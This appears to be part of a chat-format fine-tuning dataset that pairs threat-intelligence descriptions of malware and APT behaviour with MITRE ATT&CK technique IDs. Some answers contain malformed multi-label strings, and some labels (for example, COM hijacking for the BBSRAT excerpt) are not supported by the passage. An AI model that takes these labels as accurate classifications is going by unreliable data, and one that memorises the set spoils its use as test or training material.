- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wizard Spider has used the icacls command to modify access control to backup servers, providing them with full control of all the system folders."
- },
- {
- "role": "assistant",
- "content": "T1222.001 - File and Directory Permissions Modification: Windows File and Directory Permissions Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "used a tool called MailSniper to search for files on the desktop and another utility called Sobolsoft to extract attachments from EML files."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 has lured targets to download a Cobalt Strike beacon by including a malicious link within spearphishing emails."
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoetRAT has the ability to compress files with zip."
- },
- {
- "role": "assistant",
- "content": "T1560.001 - Archive Collected Data: Archive via Utility"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pupy can compress data with Zip before sending it over C2."
- },
- {
- "role": "assistant",
- "content": "T1560.001 - Archive Collected Data: Archive via Utility"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "IndigoZebra sent spearphishing emails containing malicious password-protected RAR attachments."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Frankenstein has enumerated hosts via Empire, gathering various local system information."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "attempts to detect several anti-virus products."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RainyDay has the ability to uninstall itself by deleting its service and files."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rifdoor has encrypted command and control (C2) communications with a stream cipher."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Backdoor.Oldrea can use a network scanning module to identify ICS-related ports."
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The dropper extracts modules from these resources by seeking a specific offset and reading a specific number of bytes as the length of the ciphertext. The dropper then decrypts the ciphertext by using an XOR cipher and a specific base64 encode string that is decoded and used as the key. Before accessing the ciphertext, the dropper subtracts 14 from the specified offset, which is the same as previous Disttrack samples delivered in Shamoon 2 attacks. Tables 1, 2, and 3 include the resources, the information used to extract them, and the resulting module"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gelsemium has used unverified signatures on malicious DLLs."
- },
- {
- "role": "assistant",
- "content": "T1036.001 - Invalid Code Signature"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Windshift has used links embedded in e-mails to lure victims into executing malicious code."
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Table 2 Sandbox evasion checks in the C# variant of RogueRobin Like the original version, the C# variant of RogueRobin uses DNS tunneling to communicate with its C2 server using a variety of different DNS query types"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The implant either fetches the user agent from Internet Explorer (using ObtainUserAgentAsString()) or uses a default user agent specified in the malware binary: Mozilla/5.0 (Windows NT 6.1; WOW64) Chrome/28.0.1500.95 Safari/537.36 Control Server Communications. The malware initiates communication with the control server by sending it an HTTP POST request with additional optional HTTP data."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading', 'T1048 - Exfiltration Over Alternative Protocol', 'T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT39 has used various strains of malware to query the Registry."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has edited the `Microsoft.IdentityServer.Servicehost.exe.config` file to load a malicious DLL into the AD FS process, thereby enabling persistent access to any service federated with AD FS for a user with a specified User Principal Name."
- },
- {
- "role": "assistant",
- "content": "T1556.007 - Hybrid Identity"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN8's malicious spearphishing payloads are executed as PowerShell. FIN8 has also used PowerShell for lateral movement and credential access."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is digitally signed by Microsoft."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SharpStage can execute arbitrary commands with the command line."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Axiom has used VPS hosting providers in targeting of intended victims."
- },
- {
- "role": "assistant",
- "content": "T1583.003 - Virtual Private Server"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Higaisa used an XSL file to run VBScript code."
- },
- {
- "role": "assistant",
- "content": "T1220 - XSL Script Processing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of deleting files. It has been observed loading a Linux Kernel Module (LKM) and then deleting it from the hard disk as well as overwriting the data with null bytes."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turla surveys a system upon check-in to discover remote systems on a local network using the \"net view\" and \"net view /DOMAIN\" commands. Turla has also used \"net group \"Domain Computers\" /domain\", \"net group \"Domain Controllers\" /domain\", and \"net group \"Exchange Servers\" /domain\" to enumerate domain computers, including the organization's DC and Exchange Server."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The config file is encrypted with RC4."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat Group-3390 has locally staged encrypted archives for later exfiltration efforts."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Each Casbaneiro sample using this method has the buyer’s ID hardcoded in its data. When it downloads such configuration file, it parses it and finds the line that is intended for the specific buyer’s ID and downloads and executes the payload"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1036.005 - Masquerading: Match Legitimate Name or Location', 'T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Background From October 2012 to May 2014, FireEye observed APT12 utilizing RIPTIDE, a proxy-aware backdoor that communicates via HTTP to a hard-coded command and control (C2) server"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kwampirs collects network adapter and interface information by using the commands \"ipconfig /all\", \"arp -a\" and \"route print\". It also collects the system's MAC address with \"getmac\" and domain configuration with \"net config workstation\"."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QuasarRAT can use port 4782 on the compromised host for TCP callbacks."
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Wocao, threat actors discovered the local disks attached to the system and their hardware information including manufacturer and model, as well as the OS versions of systems connected to a targeted network."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TAINTEDSCRIBE has used FakeTLS for session authentication."
- },
- {
- "role": "assistant",
- "content": "T1001.003 - Protocol or Service Impersonation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware contains 1 function, the purpose is to open the drive of the infected system (\\\\.\\PhysicalDrive0) and write the following data to the MBR: You can see the \"Are you Happy. After writing to the MBR, the malware reboots the machine with the following command: c:\\windows\\system32\\shutdown /r /t 1 After the reboot, the MBR displays the following string to the user: The link to the other campaigns was the following PDB path"
- },
- {
- "role": "assistant",
- "content": "T1529 - System Shutdown/Reboot"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ebury can exfiltrate SSH credentials through custom DNS queries."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "However, while the malware used in these new attacks uses similar infection mechanisms to PlugX, it is a completely new tool with its own specific behavior patterns and architecture. We have named this tool “BBSRAT. Targeting and Infrastructure . As described in earlier reports on “Roaming Tiger”, the attack observed in August 2015 used weaponized exploit documents that leave Russian language decoy document files after infecting the system. Figure 2 confirms that the decoy document that opens after the malware infects the system is indeed a list of international exhibitions that were conducted on Russian territory in 2015. Analysis of the command and control (C2) infrastructure shows that the newly discovered samples of BBSRAT used the same C2 domains as previously published in the “Roaming Tiger” campaign, including transactiona[.]com and futuresgold[.]com. This may indicate that for the newer attack campaign using BBSRAT, the adversary may have deployed purpose-built variants and/or infrastructure for each of the intended targets. As we can see, the second command is specifically crafted to run on 64-bit versions of Microsoft Windows. Every subsequent request made by BBSRAT increments this counter by one. The following commands and sub-commands have been identified: Please refer to the appendix for a full list of identified BBSRAT samples and their associated C2 servers. Despite the fact that the information about these attackers has been public for over a year, including a listing of many of the command and control servers, they continue to reuse much of their exposed playbook"
- },
- {
- "role": "assistant",
- "content": "T1546.015 - Event Triggered Execution: Component Object Model Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The following code snippet was used to decode strings within OopsIE:out = \"\" for e in obfuscated_string.split(\"-\"): out += chr(int(e)-1)When first run, this OopsIE variant runs a variety of checks to avoid running in an analysis environment, as discussed in the previous section"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gelsemium can open random files and Registry keys to obscure malware behavior from sandbox analysis."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has exfiltrated files stolen from file shares."
- },
- {
- "role": "assistant",
- "content": "T1039 - Data from Network Shared Drive"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In June 2015, a number of web portal email accounts were hacked, sending emails with malicious Hangul document files and phishing emails to steal portal account credentials. In January 2016, a large number of emails with malicious attachments were sent under the guise of ‘Office of National Security at the Blue House’ to government research institutes. Analysis by related organizations identified the malicious attachment as Kimsuky malware [3"
- },
- {
- "role": "assistant",
- "content": "T1586.002 - Email Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MuddyWater has used web services including OneHub to distribute remote access tools."
- },
- {
- "role": "assistant",
- "content": "T1102.002 - Bidirectional Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Felismus collects the current username and sends it to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ShadowPad has injected an install module into a newly created process."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An APT3 downloader establishes SOCKS5 connections for its initial C2."
- },
- {
- "role": "assistant",
- "content": "T1090.002 - External Proxy', 'T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Winexe installs a service on the remote system, executes the command, then uninstalls the service."
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has tunneled RDP backdoors over port 443."
- },
- {
- "role": "assistant",
- "content": "T1043 - Commonly Used Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Finally, the malware changes the password of the local users. In the files analyzed, all the passwords chosen by the actor have the same pattern: Aa153"
- },
- {
- "role": "assistant",
- "content": "T1531 - Account Access Removal"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Misdat has uploaded files and data to its C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SUNBURST used VBScripts to initiate the execution of payloads."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The second part of API hooking hooks on “GetExtendedTcpTable. GetExtendedTcpTable” is used for retrieving a table that contains a list of TCP endpoints available to the application, and it is frequently used in some network-related commands, such as netstat. The purpose of the hook is to remove TCP endpoint records of certain PIDs. The second function, “GetRTTAndHopCount,” acts as the place to put the injected hooking code"
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Fox Kitten has exploited known vulnerabilities in remote services including RDP."
- },
- {
- "role": "assistant",
- "content": "T1210 - Exploitation of Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The example C2s used by older variants of Comnie demonstrates this: Figure 9 Old Comnie variants collecting C2 information Please refer to the Appendix for a script that may be used to decode C2 information from the older Comnie variants"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dtrack’s dropper contains a keylogging executable."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The APT1 group is known to have used pass the hash."
- },
- {
- "role": "assistant",
- "content": "T1550.002 - Use Alternate Authentication Material: Pass the Hash"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The January 2022 version of PlugX malware utilizes RC4 encryption along with a hardcoded key that is built dynamically. For communications, the data is compressed then encrypted before sending to the command and control (C2) server and the same process in reverse is implemented for data received from the C2 server. e@T#L$PH%\" as it is being passed along with the encrypted data. During the January 2022 campaigns, the delivered PlugX malware samples communicated with the C2 server 92.118.188[.]78 over port 187. In the February 2022 campaign, Proofpoint researchers observed a variation in which PlugX malware used an RC4 key that was sent to the bot in the first HTTP response which was then used to encrypt data going to the C2 server"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects information on network settings and Internet proxy settings from the victim."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "communicates via ICMP for C2."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "menuPass has installed updates and new malware on victims."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT34 uses remote services such as VPN, Citrix, or OWA to persist in an environment."
- },
- {
- "role": "assistant",
- "content": "T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "REvil has used HTTP and HTTPS in communication with C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mandiant has created a task force & initiated a Global Event to track the Russian invasion of Ukraine. Department of State, hosted on a page made to look like another Department of State Public Affairs official's personal drive, and used a legitimate Department of State form as a decoy. There are several similarities and technical overlaps between the 14 November 2018, phishing campaign and the suspected APT29 phishing campaign on 9 November 2016, both of which occurred shortly after U.S. However, the new campaign included creative new elements as well as a seemingly deliberate reuse of old phishing tactics, techniques and procedures (TTPs), including using the same system to weaponize a Windows shortcut (LNK) file. It has also been over a year since we have conclusively identified APT29 activity, which raises questions about the timing and the similarities of the activity after such a long interlude. The shortcut file was crafted to execute a PowerShell command that read, decoded, and executed additional code from within the shortcut file. Previous APT29 activity targeted some of the same recipients of this email campaign, and APT29 has leveraged large waves of emails in previous campaigns. On execution, the PowerShell command extracted and executed the Cobalt Strike BEACON backdoor and decoy PDF. For example, the use of 'FromBase'+0x40+'String', in place of FromBase64String, the PowerShell command used to decode base64. The decoded command consisted of additional PowerShell that read the content of ds7002.lnk from offset 0x5e2be to offset 0x623b6, base64 decoded the extracted content, and executed it as additional PowerShell content"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ferocious can run anti-sandbox checks using the Microsoft Excel 4.0 function \"GET.WORKSPACE\" to determine the OS version, if there is a mouse present, and if the host is capable of playing sounds."
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can create a shortcut in the Windows startup folder for persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In rare cases, LockBit 2.0 has been observed to create accounts for persistence with simple names, such as `a.`"
- },
- {
- "role": "assistant",
- "content": "T1136.001 - Create Account: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects the victim's username."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can gather Registry values."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BRONZE BUTLER has collected a list of files from the victim and uploaded it to its C2 server, and then created a new list of specific files to steal."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Javali has been delivered via malicious links embedded in e-mails."
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KONNI can collect the username from the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
